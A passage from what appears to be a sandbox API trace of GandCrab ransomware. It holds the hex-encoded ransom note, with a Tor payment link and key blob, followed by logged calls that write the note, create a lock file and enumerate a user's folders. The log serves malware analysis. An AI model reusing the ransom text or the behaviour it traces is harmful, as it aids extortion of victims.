74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.943] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0095.944] CloseHandle (hObject=0x2bc) returned 1 [0095.944] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.945] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.945] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0xfe)) [0095.945] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.945] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.945] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.945] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock") returned 100 [0095.945] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\qjlg0ayf3eevs\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0095.946] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.946] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.946] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\") returned 76 [0095.946] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\*" [0095.946] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\QJlG0ayf3eEvs\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 